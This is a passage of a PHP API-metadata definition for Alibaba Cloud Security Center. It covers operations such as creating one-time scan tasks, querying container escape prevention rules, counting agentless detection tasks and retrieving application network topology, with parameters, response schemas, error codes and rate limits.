['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"061955B2-BC40-589F-AF63-C40A901EE279\\",\\n \\"Data\\": {\\n \\"ClusterName\\": \\"test\\",\\n \\"AliUid\\": 0,\\n \\"InstallKey\\": \\"BC66185***\\",\\n \\"ClusterId\\": \\"c8ca91e0907d94efaba7fb0827eb9****\\",\\n \\"GroupId\\": \\"11618788\\",\\n \\"ExpireDate\\": 1804230578566,\\n \\"AuditRegionId\\": \\"cn-hangzhou\\",\\n \\"AuditProject\\": \\"k8s-log-custom-your-project-sd89ehaaa\\",\\n \\"AuditLogStore\\": \\"audit-cf6baf6afa106eca665296fdf68b65bf\\",\\n \\"CpuArch\\": \\"x86\\\\n\\"\\n }\\n}","type":"json"}]', ], 'GenerateOnceTask' => [ 'summary' => 'Creates a one-time scan task.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'none', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92287', 'abilityTreeNodes' => ['FEATUREsasF0IRDR', 'FEATUREsas36IOGX'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'TaskType', 'in' => 'query', 'schema' => ['description' => 'The type of the scan task. Valid values:'."\n" ."\n" .'- **CLIENT\\_PROBLEM\\_CHECK**: a client troubleshooting task'."\n" ."\n" .'- **CLIENT\\_DEV\\_OPS**: a cloud DevOps task'."\n" ."\n" .'- **ASSET\\_SECURITY\\_CHECK**: an asset collection task'."\n" ."\n" .'- **ASSETS\\_COLLECTION**: an asset fingerprinting task'."\n" ."\n" .'- **IMAGE\\_SCAN**: a container image scan task'."\n" ."\n" .'- **AI\\_SECURITY\\_CHECK**: an AI asset synchronization task'."\n" ."\n" .'- **IDC\\_PROBE\\_SCAN**: an IDC probe scan task'."\n" ."\n" .'- **ATTACK\\_SURFACE\\_SCAN**: an attack surface scan task'."\n" ."\n" .'- **ASSET\\_EXPOSURE\\_SCAN**: an asset exposure scan task'."\n" ."\n" .'- **VUL\\_CHECK\\_TASK**: a vulnerability scan task', 'type' => 'string', 'required' => true, 'example' => 'CLIENT_PROBLEM_CHECK', 'title' => ''], ], [ 'name' => 'TaskName', 'in' => 'query', 'schema' => ['description' => 'The name of the scan task.'."\n" ."\n" .'-'."\n" ."\n" .'-'."\n" ."\n" .'-'."\n" ."\n" .'-'."\n" ."\n" .'-'."\n" ."\n" .'-'."\n" ."\n" .'-'."\n" ."\n" .'-'."\n" ."\n" .'-'."\n" ."\n" .'-', 'type' => 'string', 'required' => true, 'example' => 'CLIENT_PROBLEM_CHECK', 'title' => ''], ], [ 'name' => 'Param', 'in' => 'query', 'schema' => ['description' => 'A JSON string that contains additional parameters for the task.', 'type' => 'string', 'required' => true, 'example' => '{"mode":1,"problemType":"offline","uuids":"inet-795dcad1-360f-49d2-b01e-b7da7f1c****"}', 'title' => ''], ], [ 'name' => 'Source', 'in' => 'query', 'schema' => ['description' => 'The source that initiated the task.', 'type' => 'string', 'required' => false, 'example' => 'Manual', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. This unique identifier is generated by Alibaba Cloud and can be used for troubleshooting.', 'type' => 'string', 'example' => '8BB6B8FA-39E8-5654-A309-8EED13B1****', 'title' => ''], 'CanCreate' => ['description' => 'Indicates whether you can create more scan tasks. Valid values:'."\n" ."\n" .'- **true**: You can create more scan tasks.'."\n" ."\n" .'- **false**: You cannot create more scan tasks.'."\n" ."\n" .'> You can run up to 10 concurrent scan tasks. Requests to create a new task fail if this limit is exceeded. Wait for an existing task to complete before creating a new one.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'LastTask' => ['description' => 'The ID of the last task.', 'type' => 'string', 'example' => '38730bb078f4a1461d4ed283994c****'."\n", 'title' => ''], 'CollectTime' => ['description' => 'The collection time.', 'type' => 'integer', 'format' => 'int64', 'example' => '1670307567000', 'title' => ''], 'TotalCount' => ['description' => 'The total number of tasks.', 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'TaskId' => ['description' => 'The ID of the scan task.', 'type' => 'string', 'example' => '38730bb078f4a1461d4ed283994c****', 'title' => ''], 'FinishCount' => ['description' => 'The number of completed tasks.', 'type' => 'integer', 'format' => 'int32', 'example' => '61', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'AssetsCollectionFrequencyLimit', 'errorMessage' => 'Collection task frequency limit.', 'description' => ''], ['errorCode' => 'IllegalParameter', 'errorMessage' => 'Illegal parameter, please check the param.', 'description' => ''], ['errorCode' => 'UnsupportedOperation', 'errorMessage' => 'This operation is not supported.', 'description' => ''], ['errorCode' => 'TaskProcessing', 'errorMessage' => 'The baseline repair task is in progress.', 'description' => ''], ['errorCode' => '-101', 'errorMessage' => 'Invalid parameter value.', 'description' => ''], ['errorCode' => '-120', 'errorMessage' => 'The maximum number of quota is exceeded.', 'description' => ''], ['errorCode' => 'TaskRepeat', 'errorMessage' => 'Please wait last task finish.', 'description' => ''], ['errorCode' => 'BeyondQuata', 'errorMessage' => 'Please check the scan quota', 'description' => ''], ['errorCode' => 'TaskDependencyPending', 'errorMessage' => 'The previous task is not completed.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"8BB6B8FA-39E8-5654-A309-8EED13B1****\\",\\n \\"CanCreate\\": true,\\n \\"LastTask\\": \\"38730bb078f4a1461d4ed283994c****\\\\n\\",\\n \\"CollectTime\\": 1670307567000,\\n \\"TotalCount\\": 100,\\n \\"TaskId\\": \\"38730bb078f4a1461d4ed283994c****\\",\\n \\"FinishCount\\": 61\\n}","type":"json"}]', 'title' => 'GenerateOnceTask', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '1', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GenerateOnceTask'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-aegis:GenerateOnceTask', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'GetAccountLabel' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '146333', 'abilityTreeNodes' => ['FEATUREsasJODUMM'], ], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response messages. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'LabelList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The labels.', 'type' => 'array', 'items' => ['description' => 'The label list. Valid values:'."\n" ."\n" .'- **SasStep**: tiered pricing edition'."\n" .'- **SasMultiCloud**: multi-cloud edition'."\n" .'- **MultiVersion**: multi-version edition'."\n" .'- **SasMultiCloudNew**: new multi-cloud edition', 'type' => 'string', 'required' => false, 'example' => '["SasStep"]', 'title' => ''], 'required' => true, 'maxItems' => 20, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. It is a unique identifier generated by Alibaba Cloud for the request and can be used to troubleshoot issues.', 'type' => 'string', 'example' => '7BC55C8F-226E-5AF5-9A2C-2EC43864****', 'title' => ''], 'AccountLabelList' => [ 'description' => 'The label list.', 'type' => 'array', 'items' => [ 'description' => 'The label list.', 'type' => 'object', 'properties' => [ 'LabelSeries' => ['description' => 'The label information.', 'type' => 'string', 'example' => 'SasStep', 'title' => ''], 'LabelStatus' => ['description' => 'The label status. Valid values:'."\n" ."\n" .'- **true**: Valid.'."\n" .'- **false**: Invalid.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve account labels', 'summary' => 'Retrieves account labels.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetAccountLabel'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"7BC55C8F-226E-5AF5-9A2C-2EC43864****\\",\\n \\"AccountLabelList\\": [\\n {\\n \\"LabelSeries\\": \\"SasStep\\",\\n \\"LabelStatus\\": true\\n }\\n ]\\n}","type":"json"}]', ], 'GetAegisContainerPluginRule' => [ 'summary' => 'Queries the details of a container escape prevention rule.', 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '211989', 'abilityTreeNodes' => ['FEATUREsasZLVTBH'], ], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for requests and responses. Default value: **zh**. Valid values:'."\n" ."\n\n" .'- **zh**: Chinese'."\n" .'- **en**: English', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'RuleType', 'in' => 'query', 'schema' => ['description' => 'The rule type. Valid values:'."\n" .'- **0**: user-defined'."\n" .'- **1**: system built-in', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'default' => '0', 'example' => '0', 'title' => ''], ], [ 'name' => 'Id', 'in' => 'query', 'schema' => ['description' => 'The ID of the container escape prevention rule.'."\n" .'>You can call the [ListAegisContainerPluginRule](~~ListAegisContainerPluginRule~~) operation to query this parameter.', 'type' => 'string', 'required' => false, 'example' => '1141****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The response data.', 'type' => 'object', 'properties' => [ 'GmtCreate' => ['description' => 'The timestamp when the rule was created. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1671607025000', 'title' => ''], 'GmtModified' => ['description' => 'The timestamp when the rule was modified. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1671607025000', 'title' => ''], 'RuleId' => ['description' => 'The rule ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '21**', 'title' => ''], 'RuleName' => ['description' => 'The rule name.', 'type' => 'string', 'example' => 'auto_test_rule-EmzIXZ', 'title' => ''], 'RuleDescription' => ['description' => 'The rule description.', 'type' => 'string', 'example' => 'autoTest', 'title' => ''], 'RuleTemplateId' => ['description' => 'The rule template ID.', 'type' => 'string', 'example' => '100**', 'title' => ''], 'RuleTemplateName' => ['description' => 'The rule template name.', 'type' => 'string', 'example' => 'template01', 'title' => ''], 'Mode' => ['description' => 'The rule action mode. Valid values:'."\n" .'- **0**: allow'."\n" .'- **1**: alert'."\n" .'- **2**: block', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'SelectedPolicy' => [ 'description' => 'The list of selected rule items.', 'type' => 'array', 'items' => ['description' => 'The rule item.', 'type' => 'string', 'example' => 'notify_on_release_2', 'title' => ''], 'title' => '', 'example' => '', ], 'SwitchId' => ['description' => 'The ID of the corresponding switch.', 'type' => 'string', 'example' => 'USER-CONTAINER-RULE-SWITCH-TYPE_***', 'title' => ''], 'WhiteImages' => [ 'description' => 'The list of whitelisted images.', 'type' => 'array', 'items' => ['description' => 'A whitelisted image.', 'type' => 'string', 'example' => 'centos', 'title' => ''], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The request ID, which is a unique identifier that Alibaba Cloud generates for the request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '09969D2C-***0DEF8BF6F', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Query container escape prevention rule details', 'description' => 'Only Security Center Ultimate users can call this operation.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetAegisContainerPluginRule'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetAegisContainerPluginRule', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"GmtCreate\\": 1671607025000,\\n \\"GmtModified\\": 1671607025000,\\n \\"RuleId\\": 0,\\n \\"RuleName\\": \\"auto_test_rule-EmzIXZ\\",\\n \\"RuleDescription\\": \\"autoTest\\",\\n \\"RuleTemplateId\\": \\"100**\\",\\n \\"RuleTemplateName\\": \\"template01\\",\\n \\"Mode\\": 1,\\n \\"SelectedPolicy\\": [\\n \\"notify_on_release_2\\"\\n ],\\n \\"SwitchId\\": \\"USER-CONTAINER-RULE-SWITCH-TYPE_***\\",\\n \\"WhiteImages\\": [\\n \\"centos\\"\\n ]\\n },\\n \\"RequestId\\": \\"09969D2C-***0DEF8BF6F\\"\\n}","type":"json"}]', ], 'GetAegisContainerPluginRuleCriteria' => [ 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '152415', 'abilityTreeNodes' => ['FEATUREsasZLVTBH'], ], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for requesting and receiving messages. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'Value', 'in' => 'query', 'schema' => ['description' => 'The matching condition value of the plugin.', 'type' => 'string', 'required' => false, 'example' => 'ss', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The unique identifier generated by Alibaba Cloud for the request.', 'type' => 'string', 'example' => 'DA8133CC-CCA0-5CF2-BF64-FE7D52C44***', 'title' => ''], 'CriteriaList' => [ 'description' => 'The supported search criteria information.', 'type' => 'array', 'items' => [ 'description' => 'The list of scan results for authorization entries.', 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The type of query condition. Valid values:'."\n" ."\n" .'- **input**: You must manually enter the query field.'."\n" .'- **select**: You must select a subtype of the query condition from the drop-down list.', 'type' => 'string', 'example' => 'select', 'title' => ''], 'Name' => ['description' => 'The name of the corresponding query condition.'."\n" ."\n" .'- **instanceId**: The container instance ID.'."\n" .'- **clusterId**: The cluster ID.'."\n" .'- **regionId**: The container region.'."\n" .'- **clusterName**: The cluster name.'."\n" .'- **clusterType**: The cluster type.'."\n" .'- **hostIp**: The public IP address.'."\n" .'- **pod**: The pod.'."\n" .'- **podIp**: The pod IP address.'."\n" .'- **containerId**: The container ID.'."\n" .'- **containerScope**: The container type.', 'type' => 'string', 'example' => 'containerScope', 'title' => ''], 'Values' => ['description' => 'The list of values.', 'type' => 'string', 'example' => 'NO,YES', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Get Container Escape Prevention Query Criteria', 'summary' => 'Queries the query conditions of container anti-tamper rules.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetAegisContainerPluginRuleCriteria'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetAegisContainerPluginRuleCriteria', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"DA8133CC-CCA0-5CF2-BF64-FE7D52C44***\\",\\n \\"CriteriaList\\": [\\n {\\n \\"Type\\": \\"select\\",\\n \\"Name\\": \\"containerScope\\",\\n \\"Values\\": \\"NO,YES\\"\\n }\\n ]\\n}","type":"json"}]', ], 'GetAgentlessTaskCount' => [ 'summary' => 'Queries the number of agentless detection tasks.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '155838', 'abilityTreeNodes' => ['FEATUREsasON13NY'], ], 'parameters' => [ [ 'name' => 'TargetType', 'in' => 'query', 'schema' => ['description' => 'Specifies the type of the object being inspected. Valid values:'."\n" ."\n" .'* **3**: User Snapshot.'."\n" .'* **4**: User Image.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '3', 'title' => ''], ], [ 'name' => 'Target', 'in' => 'query', 'schema' => ['description' => 'The instance ID of the asset.', 'type' => 'string', 'required' => false, 'example' => 's-m5edddcwq7d57d******', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'D03DD0FD-6041-5107-AC00-383E28F1****', 'title' => ''], 'RiskMachine' => ['description' => 'The number of risky hosts.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'ScanMachine' => ['description' => 'The number of hosts that are scanned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'MaliciousFile' => ['description' => 'The number of malicious files.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Vulnerability' => ['description' => 'The number of vulnerabilities.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'LastTaskTime' => ['description' => 'The timestamp generated when the last detection is performed.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1682577532318', 'title' => ''], 'BaselineCheckCount' => ['description' => 'The number of baseline checks.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'ScaVulCount' => ['description' => 'The number of application vulnerabilities.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'CveVulCount' => ['description' => 'The number of system vulnerabilities.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'SysVulCount' => ['description' => 'The total number of Windows system vulnerabilities.'."\n", 'type' => 'string', 'example' => '1', 'title' => ''], 'SensitiveFileCount' => ['description' => 'The total number of sensitive files.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"D03DD0FD-6041-5107-AC00-383E28F1****\\",\\n \\"RiskMachine\\": 1,\\n \\"ScanMachine\\": 1,\\n \\"MaliciousFile\\": 1,\\n \\"Vulnerability\\": 1,\\n \\"LastTaskTime\\": 1682577532318,\\n \\"BaselineCheckCount\\": 1,\\n \\"ScaVulCount\\": 1,\\n \\"CveVulCount\\": 1,\\n \\"SysVulCount\\": \\"1\\",\\n \\"SensitiveFileCount\\": 1\\n}","type":"json"}]', 'title' => 'GetAgentlessTaskCount', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetAgentlessTaskCount'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetAgentlessTaskCount', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'GetAgentlessTaskUsedSizeEstimate' => [ 'methods' => ['post', 'get'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '155384', 'abilityTreeNodes' => ['FEATUREsasON13NY'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'AssetSelectionType', 'in' => 'query', 'schema' => ['description' => 'The asset selection identifier.', 'type' => 'string', 'required' => true, 'example' => 'AGENTLESS_SCAN_ONCE_TASK_1720145******', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique identifier for each API request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'CD380235-A0B8-540D-A0D5-D62884469E3C', 'title' => ''], 'EstimateUsedSize' => ['description' => 'The estimated scan volume of the detection task. Unit: GB.', 'type' => 'integer', 'format' => 'int64', 'example' => '1', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Retrieve estimated scan volume for agentless detection', 'summary' => 'Retrieves the estimated scan volume for agentless detection.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetAgentlessTaskUsedSizeEstimate'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetAgentlessTaskUsedSizeEstimate', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"CD380235-A0B8-540D-A0D5-D62884469E3C\\",\\n \\"EstimateUsedSize\\": 1\\n}","type":"json"}]', ], 'GetAlarmMachineCount' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'From', 'in' => 'query', 'schema' => ['description' => 'The source identifier of the request. Set this parameter to sas.', 'type' => 'string', 'required' => false, 'example' => 'sas', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'PlainResult', 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The data details.', 'type' => 'object', 'properties' => [ 'MachineCount' => ['description' => 'The number of servers that have security alerts.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The ID of the request. The ID is a unique identifier that Alibaba Cloud generates for the request and can be used to troubleshoot issues.', 'type' => 'string', 'example' => '6D3A2E7D-1238-5DD4-B3C3-BF06FCAD****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve the number of servers with alerts', 'summary' => 'Retrieves the number of servers that currently have security alerts.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetAlarmMachineCount'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetAlarmMachineCount', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"MachineCount\\": 1\\n },\\n \\"RequestId\\": \\"6D3A2E7D-1238-5DD4-B3C3-BF06FCAD****\\"\\n}","type":"json"}]', ], 'GetAppNetwork' => [ 'summary' => 'Retrieves the network topology between container applications.', 'methods' => ['get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'StartTime', 'in' => 'query', 'schema' => ['description' => 'The timestamp of the start time. Unit: milliseconds.'."\n" ."\n" .'> The difference between the start timestamp and the end timestamp cannot exceed **7** days.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1649260800000', 'title' => ''], ], [ 'name' => 'EndTime', 'in' => 'query', 'schema' => ['description' => 'The timestamp of the end time. Unit: milliseconds.'."\n" ."\n" .'> The difference between the start timestamp and the end timestamp cannot exceed **7** days.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1650470399999', 'title' => ''], ], [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['description' => 'The ID of the container cluster to query.'."\n" .'> You can call the [DescribeGroupedContainerInstances](~~DescribeGroupedContainerInstances~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => 'cf77xxx', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => '', 'description' => 'Schema of Response', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '7D46EDB0-xxx'], 'AppNetwork' => [ 'description' => 'The application network topology information.', 'type' => 'object', 'properties' => [ 'Node' => [ 'description' => 'The application node information.', 'type' => 'array', 'items' => [ 'description' => 'The application node information.', 'type' => 'object', 'properties' => [ 'RiskLevel' => ['description' => 'The risk level. Valid values:'."\n" ."\n" .'- **3**: High.'."\n" .'- **2**: Medium.'."\n" .'- **1**: Low.'."\n" .'- **0**: Safe.'."\n" .'- **-1**: Unknown.', 'type' => 'string', 'example' => '0', 'title' => ''], 'Id' => ['description' => 'The node ID.', 'type' => 'string', 'example' => '1274', 'title' => ''], 'NamespaceId' => ['description' => 'The namespace ID.', 'type' => 'string', 'example' => '1', 'title' => ''], 'ContainerIds' => [ 'description' => 'The list of container IDs.', 'type' => 'array', 'items' => ['description' => 'The container ID.', 'type' => 'string', 'example' => '10a6c3fbaaxxx', 'title' => ''], 'title' => '', 'example' => '', ], 'Type' => [ 'description' => 'The node type. Valid values:'."\n" .'- **app**: application'."\n" .'- **internet**: external network node.', 'enumValueTitles' => [], 'type' => 'string', 'example' => 'app', 'title' => '', ], 'Name' => ['description' => 'The node name.', 'type' => 'string', 'example' => 'console', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'Edge' => [ 'description' => 'The topology edge information.', 'type' => 'array', 'items' => [ 'description' => 'The topology edge information.', 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'The edge ID.', 'type' => 'string', 'example' => '3534', 'title' => ''], 'SrcNodeId' => ['description' => 'The source node ID.', 'type' => 'string', 'example' => '101', 'title' => ''], 'SrcNodeType' => ['description' => 'The source node type. Valid values:'."\n" .'- **app**: application.'."\n" .'- **internet**: external network node.', 'type' => 'string', 'example' => 'app', 'title' => ''], 'DstNodeId' => ['description' => 'The destination node ID.', 'type' => 'string', 'example' => '102', 'title' => ''], 'DstNodeType' => ['description' => 'The destination node type. Valid values:'."\n" .'- 